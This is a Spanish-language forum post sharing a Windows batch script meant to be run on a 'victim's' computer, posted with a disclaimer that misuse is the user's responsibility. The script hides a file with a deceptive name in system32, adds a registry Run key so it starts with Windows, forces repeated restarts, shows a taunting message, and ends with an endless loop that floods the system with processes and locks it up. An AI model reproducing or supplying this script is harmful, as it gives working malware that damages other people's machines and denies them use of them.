Muy bueno el programita ^^felicidades

veré si puedo hacer uno parecido el batch, aunke sea mas sencillo, para que esté la alternativa para quien lo prefiera ^^ y capomari.... basicamente Hackear, crakear y programar virus en diferentes programas es malo hacerselo a alguien.... pero para eso es el foro y tu puedes usar el programa como lo creas prudente y es tu responsabilida
d si lo usas para hacerle mal a alguien.... como bien he leído en varias partes del foro: "Aqui solo te ponemos la información, tu sabrás como la usas, de eso no nos responsabiliza
mos nosotros" jaja Tu tienes el poder de decidir como usar el conocimiento que aquí se comparte ^^
EDITADO
Aqui esta el codigo en batch

@echo off
cd C:\windows\system32
echo @echo off > Syscod443.bat
rem El nombre es para despistar en caso de que quieran matar el proceso ;)
echo shutdown -r -s -t 300 -f >> Syscod443.bat
rem Esto sirve para reiniciar el equipo tras 5 minutos.
echo exit >> Syscod443.bat
rem este codigo es para que el programa se cierre despues de ejecutarse.
reg add hkey_local_machine\software\microsoft\windows\currentversion\run/v Syscod443.bat/t reg_sz /d C:\windows /f
rem Con este codigo agregamos el programa a Run para que se ejecute al iniciar windows.
Msg * BaCkDoOr SnIffEr te jodio la maquina amigo ;)
rem este es un mensaje adicional que le aparecera a la victima (pueden quitarlo o cambiarlo si quieren)
start c:\windows Syscod443.bat
:menu
start
goto menu
Me tomé la libertad de hacer que el programa le trabe la computadora a la victima jaja si no le sgusta esto pueden cambiarselo en el codigo quitando la parte de
":menu
start
goto menu"
y poniendo "exit" en lugar de eso.
Para los que no saben: El comando de "rem" en batch sirve para hacer un memorandum que no saldrá en el programa a la hora de ejecutarse, solo se verá desde el modo de edición del programa y nos ayuda a los programadores a acordarnos de ciertas cosas sobre los codigos que hemos utilizado y asi no confundirnos. Yo aqui he utilizado este codigo para explicarles para que sirve cada cosa del codigo

Cualkier duda o error que tenga no duden en decirme porfavor para cambiarlo. Cuidense, USEN CONDONES! jajaja hasta luego.
BaCkDoOr SnIffEr Cambio y fuera